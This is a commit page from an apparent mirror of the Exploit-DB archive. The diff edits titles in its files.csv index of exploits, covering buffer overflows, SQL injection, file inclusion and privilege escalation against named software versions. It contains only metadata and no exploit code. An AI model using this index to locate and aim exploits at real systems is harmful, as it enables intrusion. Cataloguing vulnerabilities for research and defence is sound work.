bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-05

Browse source 
7 new exploits

Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow
Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3)

Exim 4.41 - dns_build_reverse Local Exploit
Exim 4.41 - 'dns_build_reverse' Local Exploit

3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow

BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)
BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)

ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow
ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)

Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit
Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow

Winamp 5.551 - MAKI Parsing Integer Overflow Exploit
Winamp 5.551 - MAKI Parsing Integer Overflow

Icarus 2.0 - '.icp' Local Stack Overflow (PoC)
Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)

ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)

Rock Band CMS 0.10 - news.php Multiple SQL Injection
Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1)

Winamp 5.572 - whatsnew.txt Stack Overflow Exploit
Winamp 5.572 - whatsnew.txt Stack Overflow

Joomla! Component com_wmtpic 1.0 - SQL Injection
Joomla! Component 'com_wmtpic' 1.0 - SQL Injection

TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)

Joomla! Component MediQnA 1.1 - Local File Inclusion
Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion
Joomla! Component My Car - Multiple Vulnerabilities
Joomla! Component BF Quiz - SQL Injection (1)
Joomla! Component com_jepoll - (pollid) SQL Injection
Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection
Joomla! Component 'com_mycar' - Multiple Vulnerabilities
Joomla! Component 'com_bfquiztrial' - SQL Injection (1)
Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection
Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection

Joomla! Component BF Quiz - SQL Injection (2)
Joomla! Component 'com_bfquiztrial' - SQL Injection (2)

Joomla! Component com_quran - SQL Injection
Joomla! Component 'com_quran' - SQL Injection

Joomla! Component com_g2bridge - Local File Inclusion
Joomla! Component 'com_g2bridge' - Local File Inclusion

Joomla! Component com_jsjobs - SQL Injection
Joomla! Component 'com_jsjobs' - SQL Injection
Joomla! Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection
Joomla! Component ChronoForms (com_chronocontact) - Blind SQL Injection
Joomla! Component 'com_chronoconnectivity' - Blind SQL Injection
Joomla! Component 'com_chronocontact' - Blind SQL Injection

Joomla! Component com_lead - SQL Injection
Joomla! Component 'com_lead' - SQL Injection

Joomla! Component com_djartgallery - Multiple Vulnerabilities
Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities

Joomla! Component com_searchlog - SQL Injection
Joomla! Component 'com_searchlog' - SQL Injection

Joomla! Component com_annonces - Arbitrary File Upload
Joomla! Component 'com_annonces' - Arbitrary File Upload

Joomla! Component cinema - SQL Injection
Joomla! Component 'com_cinema' - SQL Injection

Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting
Joomla! Component 'Jreservation' 1.5 - SQL Injection / Cross-Site Scripting
Joomla! Component com_jstore - SQL Injection
Joomla! Component com_jtickets - SQL Injection
Joomla! Component com_jcommunity - SQL Injection
Joomla! Component com_jmarket - SQL Injection
Joomla! Component com_jsubscription - SQL Injection
Joomla! Component 'com_jstore' - SQL Injection
Joomla! Component 'com_jtickets' - SQL Injection
Joomla! Component 'com_jcommunity' - SQL Injection
Joomla! Component 'com_jmarket' - SQL Injection
Joomla! Component 'com_jsubscription' - SQL Injection

Joomla! Component com_jnewsletter - SQL Injection
Joomla! Component 'com_jnewsletter' - SQL Injection
Joomla! Component com_joomdocs - Cross-Site Scripting
Joomla! Component Answers 2.3beta - Multiple Vulnerabilities
Joomla! Component ozio Gallery 2 - Multiple Vulnerabilities
Joomla! Component listbingo 1.3 - Multiple Vulnerabilities
Joomla! Component 'com_joomdocs' - Cross-Site Scripting
Joomla! Component 'com_answers' 2.3beta - Multiple Vulnerabilities
Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities
Joomla! Component 'com_listbingo' 1.3 - Multiple Vulnerabilities

Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting
Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting

Joomla! Component com_eportfolio - Arbitrary File Upload
Joomla! Component 'com_eportfolio' - Arbitrary File Upload
Joomla! Component Template BizWeb com_community - Persistent Cross-Site Scripting
Joomla! Component Hot Property com_jomestate - Remote File Inclusion
Joomla! Component 'com_community' - Persistent Cross-Site Scripting
Joomla! Component 'com_jomestate' - Remote File Inclusion

Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting
Joomla! Component 'JomSocial' 1.6.288 - Multiple Cross-Site Scripting

Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection
Joomla! Component 'com_ybggal' 1.0 - 'catid' Parameter SQL Injection

Joomla! Component Picasa2Gallery - Local File Inclusion
Joomla! Component 'com_picasa2gallery' - Local File Inclusion

Joomla! Component JE Ajax Event Calendar - SQL Injection
Joomla! Component 'jeeventcalendar' - SQL Injection

Joomla! Component com_realtyna - Local File Inclusion
Joomla! Component 'com_realtyna' - Local File Inclusion
Joomla! Component JE Story Submit - SQL Injection
Joomla! Component com_sef - Remote File Inclusion
Joomla! Component 'jesubmit' - SQL Injection
Joomla! Component 'com_sef' - Remote File Inclusion
Joomla! Component JE Awd Song - Persistent Cross-Site Scripting
Joomla! Component JE Media Player - Local File Inclusion
Joomla! Component 'com_awd_song' - Persistent Cross-Site Scripting
Joomla! Component 'JE Media Player' - Local File Inclusion
Joomla! Component JE Event Calendar - Local File Inclusion
Joomla! Component JE Job com_jejob - Local File Inclusion
Joomla! Component JE Section Finder - Local File Inclusion
Joomla! Component 'jeeventcalendar' - Local File Inclusion
Joomla! Component 'com_jejob' - Local File Inclusion
Joomla! Component 'jesectionfinder' - Local File Inclusion
Joomla! Component gamesbox com_gamesbox 1.0.2 - 'id' SQL Injection
Joomla! Component Joomanager - SQL Injection
Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection
Joomla! Component 'Joomanager' - SQL Injection

Joomla! Component com_dateconverter 0.1 - SQL Injection
Joomla! Component 'com_dateconverter' 0.1 - SQL Injection

Joomla! Component Front-End Article Manager System - Arbitrary File Upload
Joomla! Component 'Front-End Article Manager System' - Arbitrary File Upload

Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection
Joomla! Component 'com_seyret' - Blind SQL Injection

Joomla! Component Seyret (com_seyret) - Local File Inclusion
Joomla! Component 'com_seyret' - Local File Inclusion

Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection
Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection

Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting
Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting
Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection
Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection
Joomla! Component 'com_phocagallery' - SQL Injection
Joomla! Component 'com_addressbook' - Blind SQL Injection
Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection
Joomla! Component SEF (com_sef) - Local File Inclusion
Joomla! Component 'com_ninjamonials' - Blind SQL Injection
Joomla! Component 'com_sef' - Local File Inclusion

Joomla! Component JPodium (com_jpodium) - SQL Injection
Joomla! Component 'com_jpodium' - SQL Injection

Joomla! Component com_autartimonial - SQL Injection
Joomla! Component 'com_autartimonial' - SQL Injection

TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2)

Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)
Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)

Microsoft Excel 2010 - Crash PoC (1)
Microsoft Excel 2010 - Crash (PoC) (1)

Brooky CubeCart 2.0.1 - SQL Injection

Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting
Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting

Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting
Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access

Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities

Joomla! Component com_sar_news - 'id' Parameter SQL Injection
Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection

Joomla! Component Jreservation - Cross-Site Scripting

Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting

Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion
Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion

Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion
Joomla! Component 'com_canteen' 1.0 - Local File Inclusion

Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection
Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2)

IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation

VLC Media Player 2.2.1 - Buffer Overflow
VideoLAN VLC Media Player 2.2.1 - Buffer Overflow

Just Dial Clone Script - SQL Injection
Just Dial Clone Script - SQL Injection (1)

Just Dial Clone Script - SQL Injection
Just Dial Clone Script - SQL Injection (2)
IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation
Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow
BolinTech DreamFTP 1.02 - 'RETR' Command Remote Buffer Overflow
This commit is contained in:
Offensive Security 2016-11-05 05:01:20 +00:00
parent 1edbc5ecc4
commit c65daa1397
13 changed files with 576 additions and 149 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

178
files.csv
View file

@ -511,7 +511,7 @@ id,file,description,date,author,platform,type,port
659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0
660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service",2004-11-28,Xtiger,windows,dos,0
663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow",2004-11-29,muts,windows,remote,143
663,platforms/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - (Pegasus) IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143
664,platforms/windows/dos/664.c,"Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow",2004-11-29,NoPh0BiA,windows,dos,0
665,platforms/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow",2004-11-29,"Luigi Auriemma",windows,dos,0
667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service",2004-11-30,"Luigi Auriemma",windows,dos,0
@ -820,7 +820,7 @@ id,file,description,date,author,platform,type,port
1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - register.php SQL Injection",2005-05-20,deluxe89,php,webapps,0
1007,platforms/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,multiple,remote,0
1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0
1009,platforms/linux/local/1009.c,"Exim 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0
1009,platforms/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Exploit",2005-05-25,Plugger,linux,local,0
1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - Password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0
1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - Password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0
1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - Password.asp Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0
@ -2546,7 +2546,7 @@ id,file,description,date,author,platform,type,port
2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0
2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0
2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - (import-mt.php) Remote File Inclusion",2006-11-29,tarkus,php,webapps,0
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow Exploit",2006-11-30,cthulhu,windows,remote,69
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69
2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0
2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0
2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0
@ -2805,10 +2805,10 @@ id,file,description,date,author,platform,type,port
3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0
3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0
3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - (USER) Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0
3130,platforms/osx/dos/3130.c,"Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC)",2007-01-14,MoAB,osx,dos,0
3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,69
3132,platforms/windows/remote/3132.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Remote Buffer Overflow (1)",2007-01-15,"Jacopo Cervini",windows,remote,69
3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 - IMAP Remote Buffer Overflow",2007-01-15,"Jacopo Cervini",windows,remote,143
3134,platforms/php/webapps/3134.php,"KGB 1.9 - (sesskglogadmin.php) Local File Inclusion",2007-01-15,Kacper,php,webapps,0
3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0
@ -7837,7 +7837,7 @@ id,file,description,date,author,platform,type,port
8318,platforms/php/webapps/8318.txt,"JobHut 1.2 - (pk) SQL Injection",2009-03-30,K-159,php,webapps,0
8319,platforms/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",php,webapps,0
8320,platforms/multiple/dos/8320.py,"Opera 9.64 - (7400 nested elements) XML Parsing Remote Crash",2009-03-30,"Ahmed Obied",multiple,dos,0
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow Exploit",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0
8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,remote,0
8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation (PoC)",2009-03-30,b1@ckeYe,windows,local,0
8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",php,webapps,0
8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,php,webapps,0
@ -8287,7 +8287,7 @@ id,file,description,date,author,platform,type,port
8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - '.mp3' Local Overflow",2009-05-26,Nine:Situations:Group,windows,local,0
8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0
8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0
8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0
8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps,0
8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,multiple,remote,0
@ -8628,7 +8628,7 @@ id,file,description,date,author,platform,type,port
9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
9139,platforms/windows/remote/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,remote,0
9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0
9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.icp' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0
9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0
9142,platforms/windows/local/9142.c,"Live For Speed 2 Version Z - '.Mpr' Local Buffer Overflow",2009-07-14,n00b,windows,local,0
9143,platforms/linux/remote/9143.txt,"Virtualmin < 3.703 - Multiple Local+Remote Vulnerabilities",2009-07-14,"Filip Palian",linux,remote,0
9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0
@ -8938,7 +8938,7 @@ id,file,description,date,author,platform,type,port
9465,platforms/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,php,webapps,0
9466,platforms/windows/local/9466.pl,"Playlistmaker 1.51 - '.m3u' Local Buffer Overflow (SEH)",2009-08-18,blake,windows,local,0
9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos,0
9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow",2009-08-18,Wraith,windows,remote,69
9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69
9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps,0
9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps,0
9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0
@ -9023,7 +9023,7 @@ id,file,description,date,author,platform,type,port
9550,platforms/windows/local/9550.txt,"Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflows (SEH)",2009-08-31,hack4love,windows,local,0
9551,platforms/windows/local/9551.py,"Media Jukebox 8 - '.pls' Universal Local Buffer Exploit (SEH)",2009-08-31,mr_me,windows,local,0
9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - (listings.php op) SQL Injection",2009-08-31,Mr.SQL,php,webapps,0
9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - news.php Multiple SQL Injection",2009-08-31,Affix,php,webapps,0
9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (1)",2009-08-31,Affix,php,webapps,0
9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0
9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0
@ -10327,7 +10327,7 @@ id,file,description,date,author,platform,type,port
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
11249,platforms/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0
11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
11257,platforms/windows/remote/11257.rb,"AOL 9.5 - Phobos.Playlist 'Import()' Buffer Overflow (Metasploit)",2010-01-25,Trancer,windows,remote,0
11258,platforms/php/webapps/11258.html,"Status2k - Remote Add Admin",2010-01-25,alnjm33,php,webapps,0
@ -10831,7 +10831,7 @@ id,file,description,date,author,platform,type,port
11834,platforms/windows/local/11834.py,"Kenward Zipper 1.4 - Stack Buffer Overflow (PoC)",2010-03-22,mr_me,windows,local,0
11835,platforms/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - (Authentication Bypass) SQL Injection",2010-03-22,"cr4wl3r ",php,webapps,0
11836,platforms/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps,0
14128,platforms/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
14128,platforms/php/webapps/14128.txt,"Joomla! Component 'com_wmtpic' 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0
11837,platforms/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0
11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0
11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0
@ -11508,7 +11508,7 @@ id,file,description,date,author,platform,type,port
12601,platforms/php/webapps/12601.txt,"Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0
12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - 'DELE' Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (1)",2010-05-14,"Jeremiah Talamantes",windows,dos,0
12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0
12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0
12607,platforms/php/webapps/12607.txt,"Joomla! Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0
@ -11655,7 +11655,7 @@ id,file,description,date,author,platform,type,port
12767,platforms/php/webapps/12767.txt,"parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-27,XroGuE,php,webapps,0
14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow",2010-07-10,blake,windows,remote,0
12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0
12769,platforms/php/webapps/12769.txt,"Joomla! Component MediQnA 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0
12769,platforms/php/webapps/12769.txt,"Joomla! Component 'com_mediqna' 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,php,webapps,0
12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0
12771,platforms/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,php,webapps,0
12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps,0
@ -11664,10 +11664,10 @@ id,file,description,date,author,platform,type,port
12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0
12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component com_jepoll - (pollid) SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection",2010-05-28,v3n0m,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component 'com_mycar' - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12780,platforms/php/webapps/12780.txt,"Joomla! Component 'com_bfquiztrial' - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0
12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,php,webapps,0
@ -11677,7 +11677,7 @@ id,file,description,date,author,platform,type,port
